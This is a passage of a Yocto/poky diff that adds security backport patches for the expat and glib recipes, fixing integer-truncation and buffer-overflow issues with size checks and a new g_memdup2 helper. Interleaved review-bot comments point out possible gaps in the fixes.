dtd->contentStringLen * sizeof(XML_Char)) { ++ return NULL; ++ } ++ ++ const size_t allocsize = (dtd->scaffCount * sizeof(XML_Content) ++ + (dtd->contentStringLen * sizeof(XML_Char))); + + ret = (XML_Content *)MALLOC(parser, allocsize); + if (! ret) diff --git a/poky/meta/recipes-core/expat/expat_2.2.9.bb b/poky/meta/recipes-core/expat/expat_2.2.9.bb index cd38df91d9..757c18c5fa 100644 --- a/poky/meta/recipes-core/expat/expat_2.2.9.bb +++ b/poky/meta/recipes-core/expat/expat_2.2.9.bb 
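Review bot: Every `#if UINT_MAX >= SIZE_MAX` guard added by CVE-2022-22822-27.patch (in storeAtts, addBinding, defineAttribute, nextScaffoldPart and build_model) depends on both macros being defined at that point, and the patch adds no include. An undefined identifier in `#if` evaluates to 0, so a missing `UINT_MAX` would make the guard false and silently drop the size_t checks, including on targets where `unsigned int` is as wide as `size_t`. Whether xmlparse.c in 2.2.9 already includes `<limits.h>` and `<stdint.h>` is not visible in this diff, so I would confirm that and record it in the patch header, for example `Backport note: relies on <limits.h> and <stdint.h> already being included by xmlparse.c`. The same guard is used in CVE-2021-46143.patch.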
@@ -1,13 +1,16 @@ SUMMARY = "A stream-oriented XML parser library" DESCRIPTION = "Expat is an XML parser library written in C. It is a stream-oriented parser in which an application registers handlers for things the parser might find in the XML document (like start tags)" -HOMEPAGE = "http://expat.sourceforge.net/" +HOMEPAGE = "https://github.com/libexpat/libexpat" SECTION = "libs" LICENSE = "MIT" LIC_FILES_CHKSUM = "file://COPYING;md5=5b8620d98e49772d95fc1d291c26aa79" -SRC_URI = "git://github.com/libexpat/libexpat.git;protocol=https \ +SRC_URI = "git://github.com/libexpat/libexpat.git;protocol=https;branch=master \ file://CVE-2013-0340.patch \ + file://CVE-2021-45960.patch \ + file://CVE-2021-46143.patch \ + file://CVE-2022-22822-27.patch \ file://libtool-tag.patch \ " diff --git a/poky/meta/recipes-core/fts/fts_1.2.7.bb b/poky/meta/recipes-core/fts/fts_1.2.7.bb index ea820cb0c3..d3b0f31eda 100644 --- a/poky/meta/recipes-core/fts/fts_1.2.7.bb +++ b/poky/meta/recipes-core/fts/fts_1.2.7.bb @@ -10,7 +10,7 @@ SECTION = "libs" SRCREV = "0bde52df588e8969879a2cae51c3a4774ec62472" -SRC_URI = "git://github.com/pullmoll/musl-fts.git" +SRC_URI = "git://github.com/pullmoll/musl-fts.git;branch=master;protocol=https" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27218.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27218.patch new file mode 100644 index 0000000000..6257763d8d --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27218.patch 
@@ -0,0 +1,129 @@ +Backport of: + +From 0f384c88a241bbbd884487b1c40b7b75f1e638d3 Mon Sep 17 00:00:00 2001 +From: Krzesimir Nowak <qdlacz@gmail.com> +Date: Wed, 10 Feb 2021 23:51:07 +0100 +Subject: [PATCH] gbytearray: Do not accept too large byte arrays + +GByteArray uses guint for storing the length of the byte array, but it +also has a constructor (g_byte_array_new_take) that takes length as a +gsize. gsize may be larger than guint (64 bits for gsize vs 32 bits +for guint). It is possible to call the function with a value greater +than G_MAXUINT, which will result in silent length truncation. This +may happen as a result of unreffing GBytes into GByteArray, so rather +be loud about it. + +(Test case tweaked by Philip Withnall.) + +(Backport 2.66: Add #include gstrfuncsprivate.h in the test case for +`g_memdup2()`.) + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27218 +Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com> +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + glib/garray.c | 6 ++++++ + glib/gbytes.c | 4 ++++ + glib/tests/bytes.c | 35 ++++++++++++++++++++++++++++++++++- + 3 files changed, 44 insertions(+), 1 deletion(-) + +--- a/glib/garray.c ++++ b/glib/garray.c +@@ -2234,6 +2234,10 @@ g_byte_array_steal (GByteArray *array, + * Create byte array containing the data. The data will be owned by the array + * and will be freed with g_free(), i.e. it could be allocated using g_strdup(). + * ++ * Do not use it if @len is greater than %G_MAXUINT. #GByteArray ++ * stores the length of its data in #guint, which may be shorter than ++ * #gsize. 
++ * + * Since: 2.32 + * + * Returns: (transfer full): a new #GByteArray +@@ -2245,6 +2249,8 @@ g_byte_array_new_take (guint8 *data, + GByteArray *array; + GRealArray *real; + ++ g_return_val_if_fail (len <= G_MAXUINT, NULL); ++ + array = g_byte_array_new (); + real = (GRealArray *)array; + g_assert (real->data == NULL); +--- a/glib/gbytes.c ++++ b/glib/gbytes.c +@@ -519,6 +519,10 @@ g_bytes_unref_to_data (GBytes *bytes, + * g_bytes_new(), g_bytes_new_take() or g_byte_array_free_to_bytes(). In all + * other cases the data is copied. + * ++ * Do not use it if @bytes contains more than %G_MAXUINT ++ * bytes. #GByteArray stores the length of its data in #guint, which ++ * may be shorter than #gsize, that @bytes is using. ++ * + * Returns: (transfer full): a new mutable #GByteArray containing the same byte data + * + * Since: 2.32 +--- a/glib/tests/bytes.c ++++ b/glib/tests/bytes.c +@@ -10,12 +10,12 @@ + */ + + #undef G_DISABLE_ASSERT +-#undef G_LOG_DOMAIN + + #include <stdio.h> + #include <stdlib.h> + #include <string.h> + #include "glib.h" ++#include "glib/gstrfuncsprivate.h" + + /* Keep in sync with glib/gbytes.c */ + struct _GBytes +@@ -334,6 +334,38 @@ test_to_array_transferred (void) + } + + static void ++test_to_array_transferred_oversize (void) ++{ ++ g_test_message ("g_bytes_unref_to_array() can only take GBytes up to " ++ "G_MAXUINT in length; test that longer ones are rejected"); ++ ++ if (sizeof (guint) >= sizeof (gsize)) ++ { ++ g_test_skip ("Skipping test as guint is not smaller than gsize"); ++ } ++ else if (g_test_undefined ()) ++ { ++ GByteArray *array = NULL; ++ GBytes *bytes = NULL; ++ gpointer data = g_memdup2 (NYAN, N_NYAN); ++ gsize len = ((gsize) G_MAXUINT) + 1; ++ ++ bytes = g_bytes_new_take (data, len); ++ g_test_expect_message (G_LOG_DOMAIN, G_LOG_LEVEL_CRITICAL, ++ "g_byte_array_new_take: assertion 'len <= G_MAXUINT' failed"); ++ array = g_bytes_unref_to_array (g_steal_pointer (&bytes)); ++ g_test_assert_expected_messages (); ++ g_assert_null 
(array); ++ ++ g_free (data); ++ } ++ else ++ { ++ g_test_skip ("Skipping test as testing undefined behaviour is disabled"); ++ } ++} ++ ++static void + test_to_array_two_refs (void) + { + gconstpointer memory; +@@ -410,6 +442,7 @@ main (int argc, char *argv[]) + g_test_add_func ("/bytes/to-array/transfered", test_to_array_transferred); + g_test_add_func ("/bytes/to-array/two-refs", test_to_array_two_refs); + g_test_add_func ("/bytes/to-array/non-malloc", test_to_array_non_malloc); ++ g_test_add_func ("/bytes/to-array/transferred/oversize", test_to_array_transferred_oversize); + g_test_add_func ("/bytes/null", test_null); + + return g_test_run (); diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-01.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-01.patch new file mode 100644 index 0000000000..2af9dd6aa4 --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-01.patch 
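Review bot: The length guard added to `g_byte_array_new_take()` is `g_return_val_if_fail (len <= G_MAXUINT, NULL);`, a precondition macro that GLib compiles out when built with `G_DISABLE_CHECKS`. In such a build the silent truncation described in the patch text would still happen, so it is worth confirming that the glib-2.0 recipe does not define that macro (the build flags are outside this diff). The added test also calls `g_free (data)` itself after the rejected call, which suggests the buffer is not released on failure. The new doc sentence could say so, for example `On failure %NULL is returned and @data is not freed.`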
@@ -0,0 +1,170 @@ +Backport of: + +From 5e5f75a77e399c638be66d74e5daa8caeb433e00 Mon Sep 17 00:00:00 2001 +From: Philip Withnall <pwithnall@endlessos.org> +Date: Thu, 4 Feb 2021 13:30:52 +0000 +Subject: [PATCH 01/11] gstrfuncs: Add internal g_memdup2() function +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +This will replace the existing `g_memdup()` function for use within +GLib. It has an unavoidable security flaw of taking its `byte_size` +argument as a `guint` rather than as a `gsize`. Most callers will +expect it to be a `gsize`, and may pass in large values which could +silently be truncated, resulting in an undersize allocation compared +to what the caller expects. + +This could lead to a classic buffer overflow vulnerability for many +callers of `g_memdup()`. + +`g_memdup2()`, in comparison, takes its `byte_size` as a `gsize`. + +Spotted by Kevin Backhouse of GHSL. + +In GLib 2.68, `g_memdup2()` will be a new public API. In this version +for backport to older stable releases, it’s a new `static inline` API +in a private header, so that use of `g_memdup()` within GLib can be +fixed without adding a new API in a stable release series. 
+ +Signed-off-by: Philip Withnall <pwithnall@endlessos.org> +Helps: GHSL-2021-045 +Helps: #2319 + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com> +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + docs/reference/glib/meson.build | 1 + + glib/gstrfuncsprivate.h | 55 +++++++++++++++++++++++++++++++++ + glib/meson.build | 1 + + glib/tests/strfuncs.c | 23 ++++++++++++++ + 4 files changed, 80 insertions(+) + create mode 100644 glib/gstrfuncsprivate.h + +--- a/docs/reference/glib/meson.build ++++ b/docs/reference/glib/meson.build +@@ -22,6 +22,7 @@ if get_option('gtk_doc') + 'gprintfint.h', + 'gmirroringtable.h', + 'gscripttable.h', ++ 'gstrfuncsprivate.h', + 'glib-mirroring-tab', + 'gnulib', + 'pcre', +--- /dev/null ++++ b/glib/gstrfuncsprivate.h +@@ -0,0 +1,55 @@ ++/* GLIB - Library of useful routines for C programming ++ * Copyright (C) 1995-1997 Peter Mattis, Spencer Kimball and Josh MacDonald ++ * ++ * This library is free software; you can redistribute it and/or ++ * modify it under the terms of the GNU Lesser General Public ++ * License as published by the Free Software Foundation; either ++ * version 2.1 of the License, or (at your option) any later version. ++ * ++ * This library is distributed in the hope that it will be useful, ++ * but WITHOUT ANY WARRANTY; without even the implied warranty of ++ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU ++ * Lesser General Public License for more details. ++ * ++ * You should have received a copy of the GNU Lesser General Public ++ * License along with this library; if not, see <http://www.gnu.org/licenses/>. ++ */ ++ ++#include <glib.h> ++#include <string.h> ++ ++/* ++ * g_memdup2: ++ * @mem: (nullable): the memory to copy. ++ * @byte_size: the number of bytes to copy. 
++ * ++ * Allocates @byte_size bytes of memory, and copies @byte_size bytes into it ++ * from @mem. If @mem is %NULL it returns %NULL. ++ * ++ * This replaces g_memdup(), which was prone to integer overflows when ++ * converting the argument from a #gsize to a #guint. ++ * ++ * This static inline version is a backport of the new public API from ++ * GLib 2.68, kept internal to GLib for backport to older stable releases. ++ * See https://gitlab.gnome.org/GNOME/glib/-/issues/2319. ++ * ++ * Returns: (nullable): a pointer to the newly-allocated copy of the memory, ++ * or %NULL if @mem is %NULL. ++ * Since: 2.68 ++ */ ++static inline gpointer ++g_memdup2 (gconstpointer mem, ++ gsize byte_size) ++{ ++ gpointer new_mem; ++ ++ if (mem && byte_size != 0) ++ { ++ new_mem = g_malloc (byte_size); ++ memcpy (new_mem, mem, byte_size); ++ } ++ else ++ new_mem = NULL; ++ ++ return new_mem; ++} +--- a/glib/meson.build ++++ b/glib/meson.build +@@ -268,6 +268,7 @@ glib_sources = files( + 'gslist.c', + 'gstdio.c', + 'gstrfuncs.c', ++ 'gstrfuncsprivate.h', + 'gstring.c', + 'gstringchunk.c', + 'gtestutils.c', +--- a/glib/tests/strfuncs.c ++++ b/glib/tests/strfuncs.c +@@ -32,6 +32,8 @@ + #include <string.h> + #include "glib.h" + ++#include "gstrfuncsprivate.h" ++ + #if defined (_MSC_VER) && (_MSC_VER <= 1800) + #define isnan(x) _isnan(x) + +@@ -219,6 +221,26 @@ test_memdup (void) + g_free (str_dup); + } + ++/* Testing g_memdup2() function with various positive and negative cases */ ++static void ++test_memdup2 (void) ++{ ++ gchar *str_dup = NULL; ++ const gchar *str = "The quick brown fox jumps over the lazy dog"; ++ ++ /* Testing negative cases */ ++ g_assert_null (g_memdup2 (NULL, 1024)); ++ g_assert_null (g_memdup2 (str, 0)); ++ g_assert_null (g_memdup2 (NULL, 0)); ++ ++ /* Testing normal usage cases */ ++ str_dup = g_memdup2 (str, strlen (str) + 1); ++ g_assert_nonnull (str_dup); ++ g_assert_cmpstr (str, ==, str_dup); ++ ++ g_free (str_dup); ++} ++ + /* Testing g_strpcpy() function 
with various positive and negative cases */ + static void + test_stpcpy (void) +@@ -2523,6 +2545,7 @@ main (int argc, + g_test_add_func ("/strfuncs/has-prefix", test_has_prefix); + g_test_add_func ("/strfuncs/has-suffix", test_has_suffix); + g_test_add_func ("/strfuncs/memdup", test_memdup); ++ g_test_add_func ("/strfuncs/memdup2", test_memdup2); + g_test_add_func ("/strfuncs/stpcpy", test_stpcpy); + g_test_add_func ("/strfuncs/str_match_string", test_str_match_string); + g_test_add_func ("/strfuncs/str_tokenize_and_fold", test_str_tokenize_and_fold); diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-02.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-02.patch new file mode 100644 index 0000000000..20137ea5f3 --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-02.patch 
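Review bot: The new private header glib/gstrfuncsprivate.h defines `static inline gpointer g_memdup2 (...)` with no include guard around it. Any translation unit that reaches it twice, directly and through another header, would fail with a redefinition error, and later patches in this series add the include to many files. I would wrap the header body in `#ifndef __G_STRFUNCS_PRIVATE_H__` / `#define __G_STRFUNCS_PRIVATE_H__` / `#endif`, and note in the patch header that this deviates from the upstream backport. The doc comment's `Since: 2.68` could also be qualified, since in this tree the function is internal only.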
@@ -0,0 +1,249 @@ +From be8834340a2d928ece82025463ae23dee2c333d0 Mon Sep 17 00:00:00 2001 +From: Philip Withnall <pwithnall@endlessos.org> +Date: Thu, 4 Feb 2021 13:37:56 +0000 +Subject: [PATCH 02/11] gio: Use g_memdup2() instead of g_memdup() in obvious + places +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Convert all the call sites which use `g_memdup()`’s length argument +trivially (for example, by passing a `sizeof()`), so that they use +`g_memdup2()` instead. + +In almost all of these cases the use of `g_memdup()` would not have +caused problems, but it will soon be deprecated, so best port away from +it. + +Signed-off-by: Philip Withnall <pwithnall@endlessos.org> +Helps: #2319 + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com> +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + gio/gdbusconnection.c | 5 +++-- + gio/gdbusinterfaceskeleton.c | 3 ++- + gio/gfile.c | 7 ++++--- + gio/gsettingsschema.c | 5 +++-- + gio/gwin32registrykey.c | 8 +++++--- + gio/tests/async-close-output-stream.c | 6 ++++-- + gio/tests/gdbus-export.c | 5 +++-- + gio/win32/gwinhttpfile.c | 9 +++++---- + 8 files changed, 29 insertions(+), 19 deletions(-) + +--- a/gio/gdbusconnection.c ++++ b/gio/gdbusconnection.c +@@ -110,6 +110,7 @@ + #include "gasyncinitable.h" + #include "giostream.h" + #include "gasyncresult.h" ++#include "gstrfuncsprivate.h" + #include "gtask.h" + #include "gmarshal-internal.h" + +@@ -4007,7 +4008,7 @@ _g_dbus_interface_vtable_copy (const GDB + /* Don't waste memory by copying padding - remember to update this + * when changing struct _GDBusInterfaceVTable in gdbusconnection.h + */ +- return g_memdup ((gconstpointer) vtable, 3 * sizeof (gpointer)); ++ return g_memdup2 ((gconstpointer) vtable, 3 * sizeof (gpointer)); + } + + static void +@@ 
-4024,7 +4025,7 @@ _g_dbus_subtree_vtable_copy (const GDBus + /* Don't waste memory by copying padding - remember to update this + * when changing struct _GDBusSubtreeVTable in gdbusconnection.h + */ +- return g_memdup ((gconstpointer) vtable, 3 * sizeof (gpointer)); ++ return g_memdup2 ((gconstpointer) vtable, 3 * sizeof (gpointer)); + } + + static void +--- a/gio/gdbusinterfaceskeleton.c ++++ b/gio/gdbusinterfaceskeleton.c +@@ -28,6 +28,7 @@ + #include "gdbusmethodinvocation.h" + #include "gdbusconnection.h" + #include "gmarshal-internal.h" ++#include "gstrfuncsprivate.h" + #include "gtask.h" + #include "gioerror.h" + +@@ -701,7 +702,7 @@ add_connection_locked (GDBusInterfaceSke + * properly before building the hooked_vtable, so we create it + * once at the last minute. + */ +- interface_->priv->hooked_vtable = g_memdup (g_dbus_interface_skeleton_get_vtable (interface_), sizeof (GDBusInterfaceVTable)); ++ interface_->priv->hooked_vtable = g_memdup2 (g_dbus_interface_skeleton_get_vtable (interface_), sizeof (GDBusInterfaceVTable)); + interface_->priv->hooked_vtable->method_call = skeleton_intercept_handle_method_call; + } + +--- a/gio/gfile.c ++++ b/gio/gfile.c +@@ -60,6 +60,7 @@ + #include "gasyncresult.h" + #include "gioerror.h" + #include "glibintl.h" ++#include "gstrfuncsprivate.h" + + + /** +@@ -7854,7 +7855,7 @@ measure_disk_usage_progress (gboolean re + g_main_context_invoke_full (g_task_get_context (task), + g_task_get_priority (task), + measure_disk_usage_invoke_progress, +- g_memdup (&progress, sizeof progress), ++ g_memdup2 (&progress, sizeof progress), + g_free); + } + +@@ -7872,7 +7873,7 @@ measure_disk_usage_thread (GTask + data->progress_callback ? 
measure_disk_usage_progress : NULL, task, + &result.disk_usage, &result.num_dirs, &result.num_files, + &error)) +- g_task_return_pointer (task, g_memdup (&result, sizeof result), g_free); ++ g_task_return_pointer (task, g_memdup2 (&result, sizeof result), g_free); + else + g_task_return_error (task, error); + } +@@ -7896,7 +7897,7 @@ g_file_real_measure_disk_usage_async (GF + + task = g_task_new (file, cancellable, callback, user_data); + g_task_set_source_tag (task, g_file_real_measure_disk_usage_async); +- g_task_set_task_data (task, g_memdup (&data, sizeof data), g_free); ++ g_task_set_task_data (task, g_memdup2 (&data, sizeof data), g_free); + g_task_set_priority (task, io_priority); + + g_task_run_in_thread (task, measure_disk_usage_thread); +--- a/gio/gsettingsschema.c ++++ b/gio/gsettingsschema.c +@@ -20,6 +20,7 @@ + + #include "gsettingsschema-internal.h" + #include "gsettings.h" ++#include "gstrfuncsprivate.h" + + #include "gvdb/gvdb-reader.h" + #include "strinfo.c" +@@ -1067,9 +1068,9 @@ g_settings_schema_list_children (GSettin + + if (g_str_has_suffix (key, "/")) + { +- gint length = strlen (key); ++ gsize length = strlen (key); + +- strv[j] = g_memdup (key, length); ++ strv[j] = g_memdup2 (key, length); + strv[j][length - 1] = '\0'; + j++; + } +--- a/gio/gwin32registrykey.c ++++ b/gio/gwin32registrykey.c +@@ -28,6 +28,8 @@ + #include <ntstatus.h> + #include <winternl.h> + ++#include "gstrfuncsprivate.h" ++ + #ifndef _WDMDDK_ + typedef enum _KEY_INFORMATION_CLASS { + KeyBasicInformation, +@@ -247,7 +249,7 @@ g_win32_registry_value_iter_copy (const + new_iter->value_name_size = iter->value_name_size; + + if (iter->value_data != NULL) +- new_iter->value_data = g_memdup (iter->value_data, iter->value_data_size); ++ new_iter->value_data = g_memdup2 (iter->value_data, iter->value_data_size); + + new_iter->value_data_size = iter->value_data_size; + +@@ -268,8 +270,8 @@ g_win32_registry_value_iter_copy (const + new_iter->value_data_expanded_charsize = 
iter->value_data_expanded_charsize; + + if (iter->value_data_expanded_u8 != NULL) +- new_iter->value_data_expanded_u8 = g_memdup (iter->value_data_expanded_u8, +- iter->value_data_expanded_charsize); ++ new_iter->value_data_expanded_u8 = g_memdup2 (iter->value_data_expanded_u8, ++ iter->value_data_expanded_charsize); + + new_iter->value_data_expanded_u8_size = iter->value_data_expanded_charsize; + +--- a/gio/tests/async-close-output-stream.c ++++ b/gio/tests/async-close-output-stream.c +@@ -24,6 +24,8 @@ + #include <stdlib.h> + #include <string.h> + ++#include "gstrfuncsprivate.h" ++ + #define DATA_TO_WRITE "Hello world\n" + + typedef struct +@@ -147,9 +149,9 @@ prepare_data (SetupData *data, + + data->expected_size = g_memory_output_stream_get_data_size (G_MEMORY_OUTPUT_STREAM (data->data_stream)); + +- g_assert_cmpint (data->expected_size, >, 0); ++ g_assert_cmpuint (data->expected_size, >, 0); + +- data->expected_output = g_memdup (written, (guint)data->expected_size); ++ data->expected_output = g_memdup2 (written, data->expected_size); + + /* then recreate the streams and prepare them for the asynchronous close */ + destroy_streams (data); +--- a/gio/tests/gdbus-export.c ++++ b/gio/tests/gdbus-export.c +@@ -23,6 +23,7 @@ + #include <string.h> + + #include "gdbus-tests.h" ++#include "gstrfuncsprivate.h" + + /* all tests rely on a shared mainloop */ + static GMainLoop *loop = NULL; +@@ -671,7 +672,7 @@ subtree_introspect (GDBusConnection + g_assert_not_reached (); + } + +- return g_memdup (interfaces, 2 * sizeof (void *)); ++ return g_memdup2 (interfaces, 2 * sizeof (void *)); + } + + static const GDBusInterfaceVTable * +@@ -727,7 +728,7 @@ dynamic_subtree_introspect (GDBusConnect + { + const GDBusInterfaceInfo *interfaces[2] = { &dyna_interface_info, NULL }; + +- return g_memdup (interfaces, 2 * sizeof (void *)); ++ return g_memdup2 (interfaces, 2 * sizeof (void *)); + } + + static const GDBusInterfaceVTable * +--- a/gio/win32/gwinhttpfile.c ++++ 
b/gio/win32/gwinhttpfile.c +@@ -29,6 +29,7 @@ + #include "gio/gfile.h" + #include "gio/gfileattribute.h" + #include "gio/gfileinfo.h" ++#include "gstrfuncsprivate.h" + #include "gwinhttpfile.h" + #include "gwinhttpfileinputstream.h" + #include "gwinhttpfileoutputstream.h" +@@ -393,10 +394,10 @@ + child = g_object_new (G_TYPE_WINHTTP_FILE, NULL); + child->vfs = winhttp_file->vfs; + child->url = winhttp_file->url; +- child->url.lpszScheme = g_memdup (winhttp_file->url.lpszScheme, (winhttp_file->url.dwSchemeLength+1)*2); +- child->url.lpszHostName = g_memdup (winhttp_file->url.lpszHostName, (winhttp_file->url.dwHostNameLength+1)*2); +- child->url.lpszUserName = g_memdup (winhttp_file->url.lpszUserName, (winhttp_file->url.dwUserNameLength+1)*2); +- child->url.lpszPassword = g_memdup (winhttp_file->url.lpszPassword, (winhttp_file->url.dwPasswordLength+1)*2); ++ child->url.lpszScheme = g_memdup2 (winhttp_file->url.lpszScheme, (winhttp_file->url.dwSchemeLength+1)*2); ++ child->url.lpszHostName = g_memdup2 (winhttp_file->url.lpszHostName, (winhttp_file->url.dwHostNameLength+1)*2); ++ child->url.lpszUserName = g_memdup2 (winhttp_file->url.lpszUserName, (winhttp_file->url.dwUserNameLength+1)*2); ++ child->url.lpszPassword = g_memdup2 (winhttp_file->url.lpszPassword, (winhttp_file->url.dwPasswordLength+1)*2); + child->url.lpszUrlPath = wnew_path; + child->url.dwUrlPathLength = wcslen (wnew_path); + child->url.lpszExtraInfo = NULL; diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-03.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-03.patch new file mode 100644 index 0000000000..eceff161a6 --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-03.patch 
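Review bot: In the gio/win32/gwinhttpfile.c hunk of CVE-2021-27219-02.patch the size passed to `g_memdup2()` is still computed as `(winhttp_file->url.dwSchemeLength+1)*2`, and likewise for the host name, user name and password. If those `dw…Length` members are 32-bit `DWORD`s (their declaration is outside this diff), the addition and multiplication wrap before the result is widened to `gsize`, so changing the callee alone leaves the undersized-allocation risk in place. Doing the arithmetic in `gsize`, for example `g_memdup2 (winhttp_file->url.lpszScheme, ((gsize) winhttp_file->url.dwSchemeLength + 1) * 2)`, on all four calls would close it, unless a later patch in this series already does so. The enclosing function starts and ends outside the hunk.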
@@ -0,0 +1,131 @@ +From 6110caea45b235420b98cd41d845cc92238f6781 Mon Sep 17 00:00:00 2001 +From: Philip Withnall <pwithnall@endlessos.org> +Date: Thu, 4 Feb 2021 13:39:25 +0000 +Subject: [PATCH 03/11] gobject: Use g_memdup2() instead of g_memdup() in + obvious places +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Convert all the call sites which use `g_memdup()`’s length argument +trivially (for example, by passing a `sizeof()`), so that they use +`g_memdup2()` instead. + +In almost all of these cases the use of `g_memdup()` would not have +caused problems, but it will soon be deprecated, so best port away from +it. + +Signed-off-by: Philip Withnall <pwithnall@endlessos.org> +Helps: #2319 + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com> +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + gobject/gsignal.c | 3 ++- + gobject/gtype.c | 9 +++++---- + gobject/gtypemodule.c | 3 ++- + gobject/tests/param.c | 4 +++- + 4 files changed, 12 insertions(+), 7 deletions(-) + +--- a/gobject/gsignal.c ++++ b/gobject/gsignal.c +@@ -28,6 +28,7 @@ + #include <signal.h> + + #include "gsignal.h" ++#include "gstrfuncsprivate.h" + #include "gtype-private.h" + #include "gbsearcharray.h" + #include "gvaluecollector.h" +@@ -1809,7 +1810,7 @@ g_signal_newv (const gchar *signal + node->single_va_closure_is_valid = FALSE; + node->flags = signal_flags & G_SIGNAL_FLAGS_MASK; + node->n_params = n_params; +- node->param_types = g_memdup (param_types, sizeof (GType) * n_params); ++ node->param_types = g_memdup2 (param_types, sizeof (GType) * n_params); + node->return_type = return_type; + node->class_closure_bsa = NULL; + if (accumulator) +--- a/gobject/gtype.c ++++ b/gobject/gtype.c +@@ -33,6 +33,7 @@ + + #include "glib-private.h" + #include "gconstructor.h" ++#include 
"gstrfuncsprivate.h" + + #ifdef G_OS_WIN32 + #include <windows.h> +@@ -1470,7 +1471,7 @@ type_add_interface_Wm (TypeNode + iholder->next = iface_node_get_holders_L (iface); + iface_node_set_holders_W (iface, iholder); + iholder->instance_type = NODE_TYPE (node); +- iholder->info = info ? g_memdup (info, sizeof (*info)) : NULL; ++ iholder->info = info ? g_memdup2 (info, sizeof (*info)) : NULL; + iholder->plugin = plugin; + + /* create an iface entry for this type */ +@@ -1731,7 +1732,7 @@ type_iface_retrieve_holder_info_Wm (Type + INVALID_RECURSION ("g_type_plugin_*", iholder->plugin, NODE_NAME (iface)); + + check_interface_info_I (iface, instance_type, &tmp_info); +- iholder->info = g_memdup (&tmp_info, sizeof (tmp_info)); ++ iholder->info = g_memdup2 (&tmp_info, sizeof (tmp_info)); + } + + return iholder; /* we don't modify write lock upon returning NULL */ +@@ -2016,10 +2017,10 @@ type_iface_vtable_base_init_Wm (TypeNode + IFaceEntry *pentry = type_lookup_iface_entry_L (pnode, iface); + + if (pentry) +- vtable = g_memdup (pentry->vtable, iface->data->iface.vtable_size); ++ vtable = g_memdup2 (pentry->vtable, iface->data->iface.vtable_size); + } + if (!vtable) +- vtable = g_memdup (iface->data->iface.dflt_vtable, iface->data->iface.vtable_size); ++ vtable = g_memdup2 (iface->data->iface.dflt_vtable, iface->data->iface.vtable_size); + entry->vtable = vtable; + vtable->g_type = NODE_TYPE (iface); + vtable->g_instance_type = NODE_TYPE (node); +--- a/gobject/gtypemodule.c ++++ b/gobject/gtypemodule.c +@@ -19,6 +19,7 @@ + + #include <stdlib.h> + ++#include "gstrfuncsprivate.h" + #include "gtypeplugin.h" + #include "gtypemodule.h" + +@@ -436,7 +437,7 @@ g_type_module_register_type (GTypeModule + module_type_info->loaded = TRUE; + module_type_info->info = *type_info; + if (type_info->value_table) +- module_type_info->info.value_table = g_memdup (type_info->value_table, ++ module_type_info->info.value_table = g_memdup2 (type_info->value_table, + sizeof (GTypeValueTable)); 
+ + return module_type_info->type; +--- a/gobject/tests/param.c ++++ b/gobject/tests/param.c +@@ -2,6 +2,8 @@ + #include <glib-object.h> + #include <stdlib.h> + ++#include "gstrfuncsprivate.h" ++ + static void + test_param_value (void) + { +@@ -874,7 +876,7 @@ main (int argc, char *argv[]) + test_path = g_strdup_printf ("/param/implement/subprocess/%d-%d-%d-%d", + data.change_this_flag, data.change_this_type, + data.use_this_flag, data.use_this_type); +- test_data = g_memdup (&data, sizeof (TestParamImplementData)); ++ test_data = g_memdup2 (&data, sizeof (TestParamImplementData)); + g_test_add_data_func_full (test_path, test_data, test_param_implement_child, g_free); + g_free (test_path); + } diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-04.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-04.patch new file mode 100644 index 0000000000..6a3ac6b552 --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-04.patch 
